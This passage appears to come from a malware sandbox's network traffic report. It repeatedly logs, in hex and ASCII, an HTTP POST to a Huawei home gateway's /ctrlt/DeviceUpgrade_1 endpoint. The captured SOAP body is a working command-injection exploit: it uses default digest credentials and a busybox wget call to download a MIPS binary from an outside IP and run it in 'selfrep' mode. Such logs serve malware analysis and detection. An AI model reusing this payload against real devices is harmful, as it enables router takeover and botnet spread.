73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 